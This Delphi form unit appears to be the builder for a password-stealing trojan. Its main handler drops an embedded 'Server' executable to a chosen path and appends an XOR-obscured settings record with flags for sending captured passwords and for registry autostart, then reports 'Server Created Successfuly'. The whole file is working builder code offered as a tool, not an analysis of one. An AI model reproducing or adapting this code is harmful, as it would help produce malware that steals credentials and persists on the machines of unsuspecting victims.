unit Unit1;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls;

type
  TForm1 = class(TForm)
    Button1: TButton;
    CheckBox1: TCheckBox;
    CheckBox2: TCheckBox;
    Edit2: TEdit;
    Edit3: TEdit;
    Button2: TButton;
    Label1: TLabel;
    Label2: TLabel;
    Label3: TLabel;
    Label4: TLabel;
    procedure Button1Click(Sender: TObject);
    procedure Button2Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}
{$R 'Resource.res'}

var
  HF:HFile;
  Mdata:Record
          Check:string[15];
          Sendpass:boolean;
          Regstart:boolean;
          Id:string[80];
        end;

Function ExtractRES(ResName,ResType,Filename:PChar):boolean;
var hFile,hRes,hResInfo,Dummy:LongWord;
begin
 Result:=False;
 hFile:=CreateFile(Filename,GENERIC_WRITE,FILE_SHARE_READ,nil,
                            CREATE_ALWAYS,FILE_ATTRIBUTE_ARCHIVE,0);
 if hFile<>0 then begin
  try
   hResInfo:=FindResource(hInstance,ResName,ResType);
   hRes:=LoadResource(hInstance,hResInfo);
   if hRes<>0 then
    WriteFile(hFile,LockResource(hRes)^,SizeOfResource(hInstance,hResInfo),Dummy,nil)
   else Exit;
  finally
   CloseHandle(hFile);
  end;
 end
 else Exit;
 Result:=True;
end;

function Encode(st:string):string;
var i:integer;
begin
  result:='';
  if st='' then exit;
  for i:=1 to length(st) do st[i]:=chr(ord(st[i]) XOR 128);
  result:=st;
end;

procedure TForm1.Button1Click(Sender: TObject);
begin
// Coded by: Magic_h2001@yahoo.com
// http://magic.shabgard.org

  With Mdata do
    begin
      Check:=Encode('Magic_h2001');
      Sendpass:=CheckBox1.Checked;
      Regstart:=CheckBox2.Checked;
      Id:=Encode(Edit2.Text);
   end;
  if not ExtractRES('Server','Exefile',pchar(Edit3.Text)) then begin
    MessageBox(Form1.Handle, pchar('Can not Create File....'),pchar('Error !'), MB_ICONERROR);
    Exit;
  end;
  HF:= CreateFile(pchar(Edit3.Text), GENERIC_WRITE,FILE_SHARE_READ,nil,
                                     OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE, 0);
  if HF=INVALID_HANDLE_VALUE then begin
    MessageBox(Form1.Handle, pchar('Can not Writ to File....'),pchar('Error !'), MB_ICONERROR);
    Exit;
  end;
  FileSeek(HF,GetFileSize(HF,NIL),FILE_BEGIN);
  FileWrite(HF,Mdata,SizeOf(Mdata));
  CloseHandle(HF);
  MessageBox(Form1.Handle, pchar('Server Created Successfuly...'),pchar('.:: Creator ::.'),MB_ICONINFORMATION);
end;

procedure TForm1.Button2Click(Sender: TObject);
begin
 Close;
end;

end.
